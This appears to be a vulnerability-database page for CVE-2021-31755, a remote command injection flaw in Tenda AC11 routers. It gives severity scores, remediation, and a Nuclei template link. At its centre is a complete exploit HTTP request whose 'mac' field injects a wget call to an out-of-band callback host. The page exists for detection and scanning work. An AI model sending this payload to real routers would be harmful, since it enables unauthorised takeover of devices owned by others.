🔙 목록으로 돌아가기

CVE-2021-31755: Tenda Router AC11 - Remote Command Injection

TitleTenda Router AC11 - Remote Command Injection
Authorgy741
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could lead to unauthorized access, data exfiltration, and complete compromise of the affected router.
RemediationApply the latest firmware update provided by Tenda to fix the remote command injection vulnerability (CVE-2021-31755).
CVSS Score9.8
EPSS Score0.94261
CVE IDCVE-2021-31755
CWE IDCWE-787
Tags cve2021 cve tenda rce oast router mirai kev vkev vuln

🔍 Vulnerability Description

Tenda Router AC11 is susceptible to remote command injection vulnerabilities in the web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.

🌐 HTTP Request

POST /goform/setmac HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_16) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15
Connection: close
Content-Length: 794
Content-Type: application/x-www-form-urlencoded
Origin: http://www.victim.com
Referer: http://www.victim.com/index.htmlr
Accept-Encoding: gzip

module1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://d5jnqb9le0o12f7j7i0gjjh61k1x31sfb.oast.online&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-31755.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-31755.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A